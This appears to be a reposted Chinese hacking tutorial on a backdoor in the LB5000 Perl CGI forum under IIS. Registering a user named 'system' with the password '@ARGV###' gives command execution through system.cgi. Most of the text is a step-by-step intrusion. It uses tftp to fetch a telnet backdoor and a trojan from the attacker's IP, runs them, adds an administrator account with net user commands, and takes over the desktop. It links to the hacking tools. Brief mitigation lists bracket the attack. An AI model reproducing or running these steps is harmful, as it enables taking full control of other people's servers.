LB5000论坛系统漏洞导制服务器被黑客全部控制-PC6手机下载站

LB5000论坛系统漏洞导制服务器被黑客全部控制

受影响的系统:  
 
 
 
安装过LB5000论坛的服务器
 
 
 
综述：
 
=====
 

 
我在看了关于以下的原始资料后,我深入了研究,我们可以把把

http://www.notfound.org/lb5000/cgi-bin/members/system.cgi?dir中的system.cgi做为一个

cmd.exe来看(功能相似)..好了.请大家先看一下原始资料。
 

 

 
----------------------原始资料------------------------------
 

 
LB5000论坛漏洞
 

 
by analysist
 

 

 
LB5K可以算是国内最流行的论坛程序了，我以前只发现过一个提升权限的漏洞，比较高的版本

基本没有什么安全问题，但是由于前些日子发现了Perl CGI在IIS下的若干问题，也想到了一

些事情，今天花了点时间重新看了一下LB5K，结果发现我们完全可以利用这两个漏洞搞一个

Perl CGI后门。
 

 
测试环境：
 

 
平台：Win32

服务器：IIS

支持Perl方式：CGI

LB5K版本：LB5000II v0830
 

 
操作步骤：
 

 
1.用户注册页面（http://www.notfound.org/lb5000/cgi-bin/register.cgi），输

入下面信息后提交：
 

 
用户名：system
 
密码：@ARGV###（需要输入两次）
 
邮件地址：thiz@thiz.org
 

 
2.后门搞定，我们测试一下：
 
http://ip//cgi-bin/members/system.cgi?cd
 
　
 
CGI ErrorThe specified CGI application misbehaved by not returning a
 
complete set of HTTP headers. The headers it did return are:
 
C:\Inetpub\cgi-bin\members

http://ip/cgi-bin/members/system.cgi?dir
 

 
CGI ErrorThe specified CGI application misbehaved by not returning a
 
complete set of HTTP headers. The headers it did return are:
 

 

 
C:\Inetpub\cgi-bin\members 的目录
 

 
2001-10-18　11:23　　　 　　　　　.
 
2001-10-18　11:23　　　 　　　　　..
 
2001-10-18　11:24　　　　　　　　　162 system.cgi
 
　　　　　　　1 个文件　　　　　　162 字节
 
　　　　　　　2 个目录　1?615?261?696 可用字节
 

 
是不是很酷？这个后门一般是不会有人发现的啦，当然我们假设管理员不看日志！：P
 

 
临时解决方法：
 

 
1.限制“/cgi-bin/members”只能本地访问，并去掉该目录执行权限
 
2.将“/cgi-bin/members”改名或移到Web目录外
 
3.不要使用CGI方式支持Perl，可以暂时改为ISAPI方式
 
4.过滤特殊的用户名，如“system”，“require”，“rename”等
 
5.限制密码只能为数字和字母组合
 

 
PS：BBS3K以及其它所有类似CGI程序都存在此安全问题，只是攻击方法略有不同。
 

 
漏洞分析：
 

 
==========
 
cgi-bin\members目录里中的system.cgi是在论坛注册成功system用户后出现的一个CGI文

件，后门文件为system.cgi.但打开system.cgi 来看.并没有什么后门程序..
 

 
-------------system.cgi源程序为--------------
 

 
system@ARGV###Memberme0|0thiz@thiz.orgyesxx.xxx.xxx.xxxhttp://
 

 
----------------------------------------------
 

 
接着.我深入开始录找有关后门的程序,在注册程序register.cgi中也未能发现..经过一段

时间的研究和分析全部程序,找出了有问产生后门的源代码和相关文件,在此,我暂不公布源代

码.只介绍此漏洞造成的危险性。
 

 

 

 
漏洞测试：
 
==========
 

 
从上面的描述可以看出，我们可以利用这个漏洞看到LB5000的目录和文件，

http://ip//cgi-bin/members/system.cgi?dir ，“system.cgi?dir”

很相似于基于cmd.exe的UNICODE漏洞（cmd.exe?/c+dir+c:\），（关于unicode漏洞

教程在本站黑客教程中有详细资料）。因此，研究后门源代码后，知道可以用system.cgi?dir

来浏览到整个服务器的文件和目录。并且可以运行和执行别的程序，（可以上载和执行别的后

门入侵程序）所以，黑客可以利用此后门来完全控制服务器。
 

 
入侵过程为：

1.如原始资料所述注册SYSTEM这个用户名。
 

 
2.http://ip//cgi-bin/members/system.cgi?dir　 得出:E:\LB所在的目录
 

 
2001-10-19  01:03　　　 　　　　  .
 
2001-10-19  01:03　　　 　　　　  ..
 
2001-10-19  01:03　　　 　　　　  bbs
 
2001-10-19  01:03　　　 　　　　  cgi-bin
 
2001-10-11  21:31　　　　　　　　  133 index.asp
 
　　　　　　　1 个文件　　　　　  133 字节
 
　　　　　　　4 个目录  3,415,437,312 可用字节
 

 
OK.到这里，说明后门可以利用。下面将讲述服务器的入侵方式。
 

 
3.http://ip//cgi-bin/members/system.cgi?dir+c:\  
 

 
(YES～,现在浏览到服务器Ｃ盘下全部目录和文件。)
 

 
c:\ 的目录
 

 
2001-10-19  19:34　　　　　　　　  638 aureate-uninstall-log.txt
 
2001-10-18  23:31　　　 　　　　  Documents and Settings
 
2001-10-19  19:53　　　 　　　　  Downloads
 
2001-10-19  01:09　　　 　　　　  Inetpub
 
2001-10-19  19:33　　　　　　　  4,806 odbcconf.log
 
2001-10-19  01:17　　　 　　　　  Perl
 
2001-10-21  04:21　　　 　　　　  Program Files
 
2001-10-19  19:20　　　 　　　　  sql2ksp1
 
2001-10-21  04:21　　　 　　　　  WINNT
 
　　　　　　　2 个文件　　　　  5,444 字节
 
　　　　　　　7 个目录  5,781,913,600 可用字节
 

 
在此，你可以用system.cgi?dir+c:\或dir+d:\ 、dir+e:\　 ....等等来完全访问到服

务器的所以硬盘根目录下。如果要进一步的访问别的目录，则可以用system.cgi?dir+盘符\

目录名如：

http://ip/cgi-bin/members/system.cgi?dir+e:\xajh  
 
 
 
　　e:\xajh 的目录
 

 
2001-10-27  01:44　　　 　　　　  .
 
2001-10-27  01:44　　　 　　　　  ..
 
2001-10-06  00:40　　　　　　  301,974 1.jpg
 
2001-10-06  00:40　　　　　　  325,735 2.jpg
 
2001-11-01  17:33　　　 　　　　  data
 
2001-10-02  20:31　　　　　　  377,589 Fp.jpg
 
2001-10-02  20:31　　　　　　  433,779 Fp1.jpg
 
2001-09-23  11:50　　　　　　　  7,141 global.asa
 
2001-09-23  11:48　　　　　　　　  119 index.asp
 
2001-10-25  01:18　　　　  647,473,224 OfficeXPsc.ISO
 
2001-10-27  01:42　　　 　　　　  rpg
 
2001-10-27  01:52　　　　　 30,398,179 rpg.rar
 
2001-10-20  18:33　　　　　 10,221,962 webadmin.rar
 
2001-11-01  00:27　　　 　　　　  xajh
 
　　　　　　 10 个文件　  698,638,966 字节
 
　　　　　　　5 个目录  3,415,437,312 可用字节
 

 
 
 
4.目录被列出，到这，可以象unicode漏洞方式一样，只是system.cgi?后面不要加c+，如：

system.cgi?tftp、system.cgi?del、system.cgi?copy，大家可以多试一下就可以

搞定的。此时可以修改主页，删除或在服务器上移动一些文件了。（有相于UNICODE漏洞的教

程大家不熟的可以到我站http://flash.hanzhong.com.cn/security的黑客教程中查

看详细教程）但此时您的权限很低，怎样得到更高得权限呢？方法也有不少，但成功率并不很

高,经过比较，让服务器下载木马的方法较好：
 

 
首先，下载http://flash.hanzhong.com.cn/security/tools/unicode.zip
 
解压后有如下文件：
 
tftpd32.exe（一个FTP服务器）
 
ncx99.exe（telnet 到99端口）
 
这两个大家都熟悉吧，其他的不用管。
 
运行tftpd32.exe
 

 
这是一个小巧的FTP服务器，在运行它之前，建议关闭其他FTP服务器，保持tftpd运行，这

时你的机器已经是一个FTP服务器了。
 

 
　
 
5.回到你的浏览器，在地址栏里填入：
 

 
http://ip/cgi-bin/members/system.cgi?tftp -i ???.???.???.???

GET ncx99.exe c:\\inetpub\\scripts\\sr.exe
 

 
???.???.???.???为你自己的IP，注意：

c:\\inetpub\\scripts\\sr.exe

其中

c:\\inetpub\\scripts\\

为主机服务器目录，要看主机的具体情况而定，sr.exe为被改名的ncx99.exe（自己选名字吧）

如下此目录不可以写入，那你寻找人一下服务器上可写的ＷＥＢ目录，然后上载到此目录中。

要看主机的具体情况而定。　　
 

 

 
6.然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时ncx99.exe

已经上传到主机c:\inetpub\scripts\目录了，您可以自己检查一下。(在这里我们假似sc

ripts目录可写，假定上载到c:\inetpub\scripts目录)
 

 
再使用如下调用来执行ncx99.exe (sr.exe可以自己定别名)
 

 
http://ip/cgi-bin/members/system.cgi?+c:\inetpub\scripts\sr.exe
 

 
然后您就可以 telnet ip 99  (这里ＩＰ是指入侵服务器的真实ＩＰ，９９为telnet后门

的端口号)
 

 
7.此时，我们就ＴＥＬＮＥＴ到服务器了，可以完全控制服务器的目录和文件，可以上载或下

载，

删除和修改等。但此时是ＧＵＥＳＴ权限，如果有此文件和目录没有权限进入或修改，那请你

上

载我本站原创里的dee.exe来完成权限的提升，有关dee的详细内容，请大家查看我站原创

里的《net dde漏洞實現夺取系统管理员权限的分析報告》和《权限提升工具，把Guest提

升为Administrat》，dee.exe可以到《权限提升工具，把Guest提升为Administrat》

此文中的下载地点下载。
 

 
8.进一步的入侵过程，此时，我们就来玩点大的，来完全控制服务器，到服务器的桌面上

玩玩去。哈哈。。。。
 

 
所需要工具为netspy.zip，是一个相似于“冰河的木马程序”，此程序可以到
 

 
http://flash.hanzhong.com.cn/security/tools/netspy.zip

中下载,下载解压后为netspy.exe (服务器上运行的木马程序)，netmonitor.exe(是我们

用来控制服务器和进入服务器桌面的木马控制器)
 

 
现在开始上载木马到服务器，回到你的浏览器，在地址栏里填入：
 

 
http://ip/cgi-bin/members/system.cgi?tftp -i ???.???.???.??? GET

netspy.exe c:\\inetpub\\scripts\\netspy.exe
 

 
然后等待...大概3分钟...IE浏览器左下角显示完成，红色漏斗消失，这时netspy.exe已

经上传到主机c:\inetpub\scripts\目录了，您可以自己检查一下。(在这里我们假似

scripts目录可写，假定上载到c:\inetpub\scripts目录)
 

 
再使用如下调用来执行netspy.exe
 

 
http://ip/cgi-bin/members/system.cgi?+c:\inetpub\scripts\netspy.exe

此时你就可以用netmonitor.exe来接入服务器了。关于netmonitor.exe的使用，我就不

说啦，很简单的，在设置这项里填写一下服务器ＩＰ，端口等设置不要改，用默认的。然后再

加一个空ＩＰ，此时，netmonitor.exe程序左边就有了二个ＩＰ，先双击空ＩＰ这个会显

示无法接入，嘿嘿，此时你就双击被你种了木马的服务器的，ＩＰ，ＯＫ，双击后就可以看到

服务器的全部硬盘了，呵呵，这证明木马可以使用了。
 

 

 
9.拿到服务器的administrator帐号和密码，然后用netmonitor.exe上的远程控制这项来

进入服务器的桌面。
 

 
ＯＫ，用上述第五、六项方式开个ＴＥＬＮＥＴ的后门，然后telnet ip 99
 

 
此时，telnet登录到服务器了。　　
 

 
执行下列命令
 

 
c:\net user xixi /add  (添加xixi这个帐号)
 

 
c:\net user xixi xixi  (给xixi这个帐号加上密码为xixi)
 

 
c:\net localgroup administrators /add guest

(把xixi提升到administrators组里，使成为administrator权限)
 
　　
 
OK,现在有帐号和密码啦，然后用netmonitor.exe上的远程控制这项来进入服务器的桌面，

填入帐号为xixi  密码为xixi ,一个回车键，哈哈,登录到服务器的桌面啦。此时，你想做

什么都可以，你就是这台服务器的主人啦。。嘿嘿。。。
 

 
附：搞到administrator方式还有：如：
 
　　
 
http://ip/cgi-bin/members/system.cgi?echo net user xixi /add
 
http://ip/cgi-bin/members/system.cgi?echo net user xixi xixi
 
http://ip/cgi-bin/members/system.cgi?echo net localgroup administrators

/add guest>>go.bat

http://ip/cgi-bin/members/system.cgi?c type go.bat

看看我们的批文件内容是否如下：
 

 
c:\net user xixi /add  (添加xixi这个帐号)
 

 
c:\net user xixi xixi  (给xixi这个帐号加上密码为xixi)
 

 
c:\net localgroup administrators /add guest

(把xixi提升到administrators组里，使成为administrator权限)然后，

http://ip/cgi-bin/members/system.cgi?+c:\inetpub\scripts\bo.bat）
 
 
 
好了。全部入侵过程结束。  
 

 
　　　　　　 
 

 
临时解决方法:
 
===========
 

 
临时解决方法：
 

 
1.限制“/cgi-bin/members”只能本地访问，并去掉该目录执行权限
 
2.将“/cgi-bin/members”改名或移到Web目录外
 
3.不要使用CGI方式支持Perl，可以暂时改为ISAPI方式
 
4.过滤特殊的用户名，如“system”，“require”，“rename”等
 
5.限制密码只能为数字和字母组合